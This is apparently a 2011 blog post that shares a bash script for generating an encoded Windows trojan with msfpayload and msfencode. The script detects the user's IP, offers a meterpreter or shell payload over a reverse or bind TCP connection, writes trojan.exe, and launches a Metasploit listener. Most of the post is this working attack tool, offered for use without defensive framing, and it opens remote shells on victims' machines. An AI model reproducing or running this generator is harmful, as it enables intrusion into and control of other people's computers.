Thursday, July 14, 2011

Script to simple using msfpayload & msfencode to create metasploit payload trojans

The following is a script I coded to simplify the ease of use for using msfpayload and msfencode to create a windows based trojan and set up the listener. Let's face it, scripting is faster and easier. Also insures it is uniform and automated.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask if you want a shell or meterpreter
  • Ask if you want it reverse connection or Bind port TCP
  • Request the Port number.
  • at that point it will create two files
  • trojan.exe - your virus payload
  • msf_Trojan_Listener - a file with a one liner to create the metasploit listener that works with your payload.
  • Next it will start msfcli to create a listener.

Here is a screenshot of it in action:

Screen Shot 1 of msf_trojan_generator
Screen Shot 2 of msf_trojan_generator

And of course, you'll probably want the code so here it is. ;-)
==================================================================
#!/bin/bash
ENCODINGTIMES=5
IP=`ifconfig | grep 'inet addr' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{print $1}'`
echo -e "\n#######################################"
echo "# MSF Trojan Generator v1.0 #"
echo -e "#######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo -e "\nYour IP = " $IP
echo -e -n "\n what type of trojan? \n 1) meterpreter \n 2) shell \n\n Which is it: "
read METERORSHELL
echo -e -n "\n What kind of trojan? \n 1) Reverse Connection \n 2) bind_TCP \n\n Which is it: "
read LISTENORREVERSE
echo -e -n "\n What port number are we going to use: "
read PORTNUM

if [ $LISTENORREVERSE = "1" ]; then
 LORR='reverse_tcp'
 LHOST='LHOST='
else
 LORR='bind_tcp'
 LHOST=''
 IP=''
 echo -e "\n Since you want a bind port\nwhat is the IP of the remote host: "
 read REMOTEHOST
 RH='RHOST='
fi

if [ $METERORSHELL = "1" ]; then
 SHELLTYPE='meterpreter'
else
SHELLTYPE='shell'
fi

echo -e "\n[*] Generating trojan with the following: \n -"$SHELLTYPE"/"$LORR "\n -"$LHOST$IP$RH$REMOTEHOST "\n -PORT=" $PORTNUM
echo -e "\n this can take some time. Please wait...\n"

msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo -e "\n[*] Done generating `pwd`/trojan.exe! \n"
ls -l trojan.exe
echo -e "\n[*] Now running listener:\n msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E\n\nNOTE: also saving this to `pwd`/msf_Trojan_Listener for a simple cat/paste later."
echo "msfcli multi/handler PAYLOAD=windows/"$SHELLTYPE"/"$LORR $LHOST$IP$RH$REMOTEHOST "LPORT="$PORTNUM "E" > msf_Trojan_Listener
msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E

==================================================================